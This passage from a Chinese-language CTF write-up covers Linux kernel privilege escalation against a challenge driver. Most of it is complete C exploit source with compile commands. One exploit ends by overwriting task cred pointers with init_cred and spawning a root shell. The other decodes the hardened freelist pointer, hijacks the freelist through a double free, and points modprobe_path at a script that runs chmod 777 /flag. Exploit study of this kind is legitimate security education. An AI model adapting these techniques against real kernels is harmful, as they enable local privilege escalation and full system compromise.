err_exit("Exhausted 4.", 0);
out4:
printf("[\x1b[32;1m+\x1b[0m] task_struct on page 0x%016lx\n", curr_page);
// Stage 9: per the task_struct layout quoted in the write-up, the two qwords
// 16 and 24 bytes before comm are cred and real_cred; point both at init_cred
// and write the page back.
task_comm[-2] = task_comm[-3] = INIT_CRED_OFFSET + kernel_base;
arb_write((void*)curr_page, 0, arb_read_buf, 0xffe);
printf("[\x1b[34;1m*\x1b[0m] uid: %d\n", getuid());
printf("[\x1b[34;1m*\x1b[0m] Getting shell...\n");
system("/bin/sh");
return 0;
}
编译:
musl-gcc -no-pie -z now -o exp_heapspray exp_heapspray.c -masm=intel -static
- 方法二:dnotify_struct + Freelist Hijacking
上述方法依赖于cross cache,后续对其他结构体的利用均可以归到此类。
然而,就如本文一开始说的那样,my_struct
不一定会与其他所有内存池隔离开来。
为方便调试,关闭kaslr,以root身份启动shell,获取内核模块的.bss
基址,根据偏移定位cache
变量,查看cache->name
,可以发现这个内存池的名字并不是my_struct
而是dnotify_struct
。
/ $ grep -r "" /sys/module/k1cache/sections/
...
/sys/module/k1cache/sections/.bss:0xffffffffc0203840
...

这意味着my_struct
成为了dnotify_struct
的别名(alias)。
因此,即便不使用cross cache的技巧,我们也可以轻易地劫持struct dnotify_struct
结构体。struct dnotify_struct
的定义如下。
struct dnotify_struct {
struct dnotify_struct * dn_next; /* 0 8 */
__u32 dn_mask; /* 8 4 */
int dn_fd; /* 12 4 */
struct file * dn_filp; /* 16 8 */
fl_owner_t dn_owner; /* 24 8 */
/* size: 32, cachelines: 1, members: 5 */
/* last cacheline: 32 bytes */
};
dnotify是一种过时的目录事件监听机制(现代化的替代方案为inotify),通过信号(SIGIO)和文件描述符通知应用程序目录内文件的修改事件(如创建、删除)。dnotify的事件队列机制在我们后续的利用中起到了重要的作用。内存池dnotify_struct_cache
用来统一管理struct dnotify_struct
。
static int __init dnotify_init(void)
{
dnotify_struct_cache = KMEM_CACHE(dnotify_struct,
SLAB_PANIC|SLAB_ACCOUNT);
dnotify_mark_cache = KMEM_CACHE(dnotify_mark, SLAB_PANIC|SLAB_ACCOUNT);
dnotify_group = fsnotify_alloc_group(&dnotify_fsnotify_ops,
FSNOTIFY_GROUP_NOFS);
if (IS_ERR(dnotify_group))
panic("unable to allocate fsnotify group for dnotify\n");
dnotify_sysctl_init();
return 0;
}
module_init(dnotify_init)
观察`fcntl_dirnotify`函数的逻辑,不难发现,如果我们想要分配一个`struct dnotify_struct`,将其挂在链表`dn_mark->dn`上又不提前触发`dnotify_flush`,参数`arg`需要满足`(arg & ~DN_MULTISHOT) != 0`(注意括号:在C语言中`!=`的优先级高于`&`)。
void dnotify_flush(struct file *filp, fl_owner_t id)
{
// ...
prev = &dn_mark->dn;
while ((dn = *prev) != NULL) {
if ((dn->dn_owner == id) && (dn->dn_filp == filp)) {
*prev = dn->dn_next;
kmem_cache_free(dnotify_struct_cache, dn);
dnotify_recalc_inode_mask(fsn_mark);
break;
}
prev = &dn->dn_next;
}
// ...
}
static int attach_dn(struct dnotify_struct *dn, struct dnotify_mark *dn_mark,
fl_owner_t id, int fd, struct file *filp, __u32 mask)
{
// ...
dn->dn_mask = mask;
dn->dn_fd = fd;
dn->dn_filp = filp;
dn->dn_owner = id;
dn->dn_next = dn_mark->dn;
dn_mark->dn = dn;
return 0;
}
int fcntl_dirnotify(int fd, struct file *filp, unsigned long arg)
{
struct dnotify_struct *dn;
// ...
/* a 0 mask means we are explicitly removing the watch */
if ((arg & ~DN_MULTISHOT) == 0) {
dnotify_flush(filp, id);
error = 0;
goto out_err;
}
// ...
/* expect most fcntl to add new rather than augment old */
dn = kmem_cache_alloc(dnotify_struct_cache, GFP_KERNEL);
if (!dn) {
error = -ENOMEM;
goto out_err;
}
// ...
error = attach_dn(dn, dn_mark, id, fd, filp, mask);
// ...
return error;
}
由于内核配置CONFIG_SLAB_FREELIST_HARDENED
默认开启,对象上freelist的指针总是被加密保护的。
static inline void *freelist_ptr(const struct kmem_cache *s, void *ptr,
unsigned long ptr_addr)
{
#ifdef CONFIG_SLAB_FREELIST_HARDENED
// ...
return (void *)((unsigned long)ptr ^ s->random ^
swab((unsigned long)kasan_reset_tag((void *)ptr_addr)));
#else
return ptr;
#endif
}
其中swab
用来反转一个64位整型的字节端序,而在没有启用硬件辅助的KASAN时kasan_reset_tag
相当于空操作。这种加密保护增添了直接篡改freelist指针的难度。
然而,利用`struct dnotify_struct`的链表结构,如果存在形如`A -> B -> C`、由`dn_next`链接、同时位于freelist上的一条链,并且`A`、`B`与`C`可以通过show与delete控制,那么我们便可以先读出`B`与`C`的地址,然后通过`B`的freelist指针计算出`cache->random`(由`freelist_ptr`可知:`random = 存储值 ^ 下一个对象的地址 ^ swab(存储位置的地址)`),用double free劫持freelist完成任意写,最后改写`modprobe_path`就行了。
FINAL EXPLOIT
注:内核基址的泄露使用cross cache与struct seq_operations
完成。
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdint.h>
#include <sched.h>
#include <errno.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/msg.h>
#include <sys/ipc.h>
#include <sys/socket.h>
#include <sys/prctl.h>
#include <unistd.h>
#include <signal.h>
#define CMD_ADD 119
#define CMD_DEL 48
#define CMD_SHOW 64
struct add_args // sizeof=0x10
{
uint64_t size;
char *buf;
};
struct del_args // sizeof=0x8
{
uint64_t idx;
};
struct show_args // sizeof=0x18
{
uint64_t idx;
uint64_t size;
char *buf;
};
/* to run the exp on the specific core only */
// void bind_cpu(int core)
// {
// cpu_set_t cpu_set;
// CPU_ZERO(&cpu_set);
// CPU_SET(core, &cpu_set);
// sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
// }
#define OBJ_SPRAY_NR 4000
#define NR_STAT 128
#define OBJECT_SIZE 32
#define MODPROBE_PATH 0xffffffff831d8ce0
int dev_fd;
#define ANON_PIPE_OPS_OFFSET 0xffffffff82246ec0ULL
#define KERNEL_BASE_0 0xffffffff81000000ULL
size_t kernel_base = 0xffffffff81000000ULL;
size_t page_offset_base = 0xffff888000000000ULL, vmemmap_base = 0xffffea0000000000ULL;
size_t page_leak;
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
/* read start from len to offset, write start from offset */
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_buf_operations {
int (*confirm)(struct pipe_inode_info *, struct pipe_buffer *);
void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
int (*try_steal)(struct pipe_inode_info *, struct pipe_buffer *);
int (*get)(struct pipe_inode_info *, struct pipe_buffer *);
};
struct seq_file;
struct seq_operations {
void * (*start) (struct seq_file *m, loff_t *pos);
void (*stop) (struct seq_file *m, void *v);
void * (*next) (struct seq_file *m, void *v, loff_t *pos);
int (*show) (struct seq_file *m, void *v);
};
/*
 * Report a fatal error and terminate the program.
 *
 * msg       - description of the step that failed.
 * use_errno - non-zero: report through perror() so the errno text is appended;
 *             zero: print the message alone with puts().
 *
 * Exits with EXIT_FAILURE. Does not return.
 */
void err_exit(char *msg, int use_errno)
{
    /* Capture errno first: the formatting call below is allowed to modify it. */
    const int saved_errno = errno;
    char buf[0x600];

    /* Bounded formatting: an over-long msg is truncated instead of overflowing buf. */
    snprintf(buf, sizeof buf, "[\x1b[31;1mFATAL\x1b[0m] %s", msg);
    if (use_errno) {
        errno = saved_errno;
        perror(buf);
    } else {
        puts(buf);
    }
    exit(EXIT_FAILURE);
}
int dev_add(void* buf) {
struct add_args req = { 0x20, buf };
return ioctl(dev_fd, CMD_ADD, &req);
}
int dev_delete(int index) {
struct del_args req = { index };
return ioctl(dev_fd, CMD_DEL, &req);
}
int dev_show(int index, void* buf) {
struct show_args req = { index, 0x20, buf };
return ioctl(dev_fd, CMD_SHOW, &req);
}
/*
 * Pretty-print OBJECT_SIZE bytes starting at `buf`, one 8-byte word per line:
 * byte offset, the word in hex, and its bytes as printable ASCII ('.' for
 * anything outside 32..126). A blank line terminates the dump.
 *
 * Each word is fetched with memcpy, so `buf` may have any alignment; callers
 * in this file pass plain char arrays.
 */
void dump(void *buf) {
    const unsigned char *bytes = buf;
    const unsigned int words = (OBJECT_SIZE + 7) >> 3;

    for (unsigned int i = 0; i < words; ++i) {
        uint64_t word;
        char ascii[9];

        memcpy(&word, bytes + (size_t)i * 8, sizeof word);
        for (int j = 0; j < 8; ++j) {
            uint8_t ch = (uint8_t)(word >> j*8);
            ascii[j] = (char)(32 <= ch && ch <= 126 ? ch : '.');
        }
        ascii[8] = 0;
        printf("\x1b[34;1m0x%08x:\x1b[0m \x1b[33;1m0x%016llx\x1b[0m /* \x1b[90;1m%s\x1b[0m */\n", i << 3, (unsigned long long)word, ascii);
    }
    printf("\n");
}
/*
 * Read slot `idx` through the show ioctl and hex-dump the 32 bytes obtained.
 *
 * Returns the status reported by dev_show(). The buffer is zero-filled first,
 * so a slot the driver refuses to show is dumped as zeros rather than as
 * leftover stack contents.
 *
 * NOTE(review): the index line is printed when VERBOSE is NOT defined; that
 * looks inverted but is kept as found - confirm the intent.
 */
long show_and_dump(size_t idx) {
#ifndef VERBOSE
    printf("Index: \x1b[32;1m%zu\x1b[0m\n", idx);
#endif
    char buf[OBJECT_SIZE] = {0};
    long status = dev_show(idx, &buf);
    dump(&buf);
    return status;
}
int dir_fd_1 = -1;
int dir_fd_2 = -1;
int dir_fd_3 = -1;
typedef void * fl_owner_t;
typedef unsigned int __u32;
struct dnotify_struct {
struct dnotify_struct * dn_next; /* 0 8 */
__u32 dn_mask; /* 8 4 */
int dn_fd; /* 12 4 */
struct file * dn_filp; /* 16 8 */
fl_owner_t dn_owner; /* 24 8 */
/* size: 32, cachelines: 1, members: 5 */
/* last cacheline: 32 bytes */
};
/*
 * Reverse the byte order of a 64-bit value (0x0102030405060708 becomes
 * 0x0807060504030201).
 *
 * Works on the value itself rather than on its in-memory bytes, so the result
 * is the same on little- and big-endian hosts.
 */
uint64_t swab64(uint64_t n) {
    uint64_t res = 0;
    for (int i = 0; i < 8; ++i) {
        /* Move the lowest remaining byte of n to the bottom of res. */
        res = (res << 8) | (n & 0xffu);
        n >>= 8;
    }
    return res;
}
size_t rnd;
int idx = 0;
/*
 * Entry point of the second proof of concept (method two in the write-up).
 *
 * Stages, in order: write the helper script, fill and free driver slots, leak
 * a kernel text pointer, reopen the device, create three dnotify watches on
 * slots the driver still references, free them again, recover the freelist
 * random value, redirect the freelist and write a path string, then run a
 * file with an unknown format.
 *
 * The statement order is part of the technique; comments below only describe
 * what each stage does.
 */
int main(){
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("error opening /dev/klcache", 1);
}
// Stage 1: drop a shell script at /tmp/victim that makes /flag accessible.
int victim_fd;
if ((victim_fd = open("/tmp/victim", O_CREAT | O_RDWR, 0777)) < 0) {
err_exit("victim", 1);
}
char cmd[] = "#!/bin/sh\nchmod 777 /flag\n";
if (write(victim_fd, cmd, strlen(cmd)) < 0) {
err_exit("write", 1);
}
close(victim_fd);
// Stage 2: create OBJ_SPRAY_NR driver objects, then delete them all.
// NOTE(review): `buf` is never initialised; its contents are whatever was on
// the stack, and the dev_add() results are not checked.
struct dnotify_struct buf;
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
dev_add(&buf);
}
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
dev_delete(i);
}
// Stage 3: open /proc/self/stat NR_STAT times, then look for a slot whose
// first qword is a kernel text pointer (the write-up attributes this leak to
// struct seq_operations).
int stat_fd[NR_STAT];
for (int i=0; i<NR_STAT; ++i) {
if ((stat_fd[i] = open("/proc/self/stat", O_RDONLY)) < 0) {
err_exit("stat", 1);
}
}
for (int i=0; i<OBJ_SPRAY_NR; ++i) {
size_t tmpbuf[4];
dev_show(i, &tmpbuf);
if (tmpbuf[0] > KERNEL_BASE_0) {
// 0xffffffff81479670 is the non-KASLR address of the leaked function
kernel_base = tmpbuf[0] - (0xffffffff81479670ULL - KERNEL_BASE_0);
goto out;
}
}
// reached only when no slot matched; the descriptors stay open on success
for (int i=0; i<NR_STAT; ++i) {
close(stat_fd[i]);
}
err_exit("Exhausted.", 0);
out:
printf("[\x1b[32;1m+\x1b[0m] Kernel Base: 0x%016lx\n", kernel_base);
// Stage 4: reopen the device, add three objects and delete them again.
// NOTE(review): this relies on the three adds landing in slots 0..2 - the
// driver picks the first empty slot, so confirm the table state at this point.
close(dev_fd);
dev_fd = open("/dev/klcache", O_RDWR);
if (dev_fd < 0) {
err_exit("error opening /dev/klcache", 1);
}
dev_add(&buf);
dev_add(&buf);
dev_add(&buf);
dev_delete(0);
dev_delete(1);
dev_delete(2);
// Stage 5: register three dnotify watches on /tmp; each allocates a
// dnotify_struct, linked together through dn_next.
if ((dir_fd_1 = open("/tmp", O_RDONLY)) < 0) err_exit("1st open", 1);
if (fcntl(dir_fd_1, F_NOTIFY, DN_MODIFY) < 0) err_exit("1st fcntl", 1);
if ((dir_fd_2 = open("/tmp", O_RDONLY)) < 0) err_exit("2nd open", 1);
if (fcntl(dir_fd_2, F_NOTIFY, DN_MODIFY) < 0) err_exit("2nd fcntl", 1);
if ((dir_fd_3 = open("/tmp", O_RDONLY)) < 0) err_exit("3rd open", 1);
if (fcntl(dir_fd_3, F_NOTIFY, DN_MODIFY) < 0) err_exit("3rd fcntl", 1);
// snapshot the live contents (not used further below)
size_t orig_buf_0[4];
size_t orig_buf_1[4];
size_t orig_buf_2[4];
dev_show(0, &orig_buf_0);
dev_show(1, &orig_buf_1);
dev_show(2, &orig_buf_2);
// Stage 6: free the three slots again through the driver and read them back;
// qword 0 still holds dn_next while qword 2 now holds the encoded freelist
// pointer.
dev_delete(2);
dev_delete(1);
dev_delete(0);
show_and_dump(0);
show_and_dump(1);
show_and_dump(2);
size_t buf0[4];
size_t buf1[4];
size_t buf2[4];
dev_show(0, &buf0);
dev_show(1, &buf1);
dev_show(2, &buf2);
// sanity print of the byte-swap helper
printf("[\x1b[34;1m*\x1b[0m] swab64(0x%016lx) = 0x%016lx\n", 0x1145141919, swab64(0x1145141919));
// Stage 7: invert freelist_ptr(): random = encoded ^ next ^ swab(slot address),
// with the slot at object + 16. Which dumped value is which object's address
// depends on the allocation order described in the write-up.
rnd = swab64(buf0[0]+16) ^ buf1[0] ^ buf1[2];
printf("[\x1b[32;1m+\x1b[0m] rnd = 0x%016lx\n", rnd);
printf("[\x1b[32;1m+\x1b[0m] buf1.next = 0x%016lx\n", rnd ^ swab64(buf1[0]+16) ^ buf2[2]);
// Stage 8: free slot 1 a second time, then add an object whose qword 2 is an
// encoded pointer to modprobe_path.
dev_delete(1);
size_t buf3[4];
size_t modprobe_path = kernel_base + (MODPROBE_PATH - KERNEL_BASE_0);
// NOTE(review): only buf3[2] is set; the other three qwords are uninitialised.
buf3[2] = rnd ^ swab64(buf0[0]+16) ^ modprobe_path;
dev_add(&buf3);
dev_add(&buf);
dev_add(&buf);
// this add writes the path string into the redirected allocation
char buf6[32];
strcpy(buf6, "/tmp/victim");
dev_add(&buf6);
// Stage 9: execute a file with an unrecognised header so the kernel invokes
// the configured modprobe helper.
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/fake");
system("chmod +x /tmp/fake");
system("/tmp/fake");
printf("[\x1b[34;1m*\x1b[0m] Granting read permission for /flag.\n");
return 0;
}
编译:
musl-gcc -no-pie -z now -o exp_dnotify exp_dnotify.c -masm=intel -static
- References